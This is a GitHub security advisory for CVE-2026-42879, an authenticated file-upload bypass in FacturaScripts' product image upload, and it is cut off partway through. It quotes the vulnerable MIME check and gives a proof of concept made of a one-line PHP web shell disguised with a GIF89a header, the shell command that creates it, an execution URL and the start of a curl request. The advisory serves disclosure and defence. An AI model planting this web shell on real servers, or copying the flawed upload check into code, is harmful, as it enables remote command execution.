GHSA-vf3q-frmr-vrr9 MEDIUM composer/facturascripts/facturascripts

CVE: CVE-2026-42879

CVE-2026-42879 - FacturaScripts - Authenticated Unrestricted File Upload via MIME Type Bypass

Summary

An authenticated unrestricted file upload vulnerability exists in FacturaScripts' product image upload functionality. An attacker with valid credentials can upload a PHP file disguised as a GIF image (using a GIF89a header), bypassing MIME type validation. The file is stored with its original extension, including executable extensions such as .php.

Details

The vulnerability exists in:

Core/Lib/ExtendedController/ProductImagesTrait.php

Specifically in the addImageAction() method.

Vulnerable Code

if (false === strpos($uploadFile->getMimeType(), 'image/')) {
    Tools::log()->error('file-not-supported');
    continue;
}
 
$folder = Tools::folder('MyFiles');
Tools::folderCheckOrCreate($folder);
$uploadFile->move($folder, $uploadFile->getClientOriginalName());

Root Cause

• The validation only checks if MIME type contains "image/"
• This can be bypassed by prepending GIF89a magic bytes to a PHP file
• The system incorrectly identifies the file as image/gif
• The file is saved with a .php extension in a web-accessible directory

File Storage Behavior

Uploaded files are stored in:

/MyFiles/YYYY/MM/X.php

Where X is an auto-incrementing ID. This allows direct remote execution:

http://target/MyFiles/2026/03/2.php?cmd=id

Impact

Successful exploitation:

An attacker may upload files with executable extensions (e.g. .php) to the server, which depending on server configuration could lead to further exploitation.

Proof of Concept (Manual)

Step 1: Create malicious file

cat > shell.jpg.php << 'EOF'
GIF89a
<?php
system($_GET['cmd']);
?>
EOF

Step 2: Authenticate

• Login to the application
• Extract PHPSESSID from browser cookies

Step 3: Get CSRF token

curl -s "http://target/EditProducto?code=CONTA621" \
  -H "Cookie: PHPSE

📌 来源: GitHub-Advisory | 🆔 CVE-2026-42879 | 📅 2026-05-07